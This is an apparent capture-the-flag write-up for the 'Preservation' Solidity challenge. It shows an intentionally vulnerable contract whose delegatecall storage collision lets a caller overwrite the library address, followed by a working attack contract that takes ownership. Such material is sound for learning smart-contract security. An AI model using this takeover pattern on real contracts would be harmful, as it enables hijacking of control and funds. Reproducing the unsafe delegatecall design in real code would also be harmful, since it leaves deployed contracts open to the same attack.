跳到主要内容

Level-16

Code

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract Preservation {
    // public library contracts
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;
    uint256 storedTime;
    // Sets the function signature for delegatecall
    bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

    constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) public {
        timeZone1Library = _timeZone1LibraryAddress;
        timeZone2Library = _timeZone2LibraryAddress;
        owner = msg.sender;
    }

    // set the time for timezone 1
    function setFirstTime(uint256 _timeStamp) public {
        timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }

    // set the time for timezone 2
    function setSecondTime(uint256 _timeStamp) public {
        timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
    }
}

// Simple library contract to set the time
contract LibraryContract {
    // stores a timestamp
    uint256 storedTime;

    function setTime(uint256 _time) public {
        storedTime = _time;
    }
}

Solution

We see the storage of LibraryContract and Preservation does not match , but the Preservation delegatecall the LibrayContract , so it will make some storage Collision problem .

we can see in Preservation::setFirstTime delegatecall setTime , and it effect the slot0 in Preservation , so we can build a attack contract and call setFirstTime to make the address public timeZone1Library equals attacker's address , then we call it again change the owner.

Hack.solsolidity
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.10;

interface IPreservation {
    function setFirstTime(uint256) external;
}

contract PreservationHack {
    // Same storage layout as contract to be attacked
    address public timeZone1Library;
    address public timeZone2Library;
    address public owner;
    uint256 storedTime;

    IPreservation public challenge;

    constructor(address challengeAddress) {
        challenge = IPreservation(challengeAddress);
    }

    function setTime(uint256 _addr) external {
        owner = address(uint160(_addr));
    }

    function attack() external {
        challenge.setFirstTime(uint256(uint160(address(this))));
        challenge.setFirstTime(uint256(uint160(msg.sender)));
    }
}
0%